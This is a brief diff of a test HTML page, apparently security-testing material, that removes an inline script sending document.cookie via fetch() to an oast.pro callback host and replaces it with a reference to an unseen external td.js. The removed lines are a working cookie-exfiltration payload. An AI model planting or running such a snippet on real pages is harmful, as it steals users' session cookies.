--- a/index.html
+++ b/index.html
@@ -3,12 +3,6 @@
   <head><meta charset="utf-8"><title>Test</title></head>
   <body>
     <h1>JS test</h1>
-    <script>
-      fetch('https://30dbf30e8f89c4628cddgt5u8pyyyyyyb.oast.pro', {
-        method: 'POST',
-        mode: 'no-cors',
-        body:document.cookie
-      });
-    </script>
+    <script src="./td.js"></script>
   </body>
 </html>
